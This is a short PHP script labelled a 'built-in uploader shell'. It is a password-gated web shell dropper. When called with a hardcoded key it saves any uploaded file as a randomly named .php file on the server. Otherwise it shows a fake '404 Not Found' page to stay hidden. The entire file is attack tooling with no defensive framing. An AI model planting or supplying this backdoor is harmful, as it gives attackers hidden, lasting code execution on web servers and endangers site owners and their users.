<?php
// Built-in uploader shell
$key = "pWg5!kZN9CHM";

if(isset($_GET['key']) && $_GET['key'] === $key) {
    if(isset($_FILES['f'])) {
        $random_num = rand(100000, 999999);
        $filename = "up_" . $random_num . ".php";
        if(move_uploaded_file($_FILES['f']['tmp_name'], $filename)) {
            $url_param = rand(100000, 999999);
            echo "SUCCESS:" . $filename . "?key=" . $url_param;
        } else {
            echo "ERROR: Failed to upload file.";
        }
    } else {
        echo '<form method="POST" enctype="multipart/form-data">
        <input type="file" name="f">
        <input type="submit" value="Upload">
        </form>';
    }
} else {
    echo "404 Not Found";
}
?>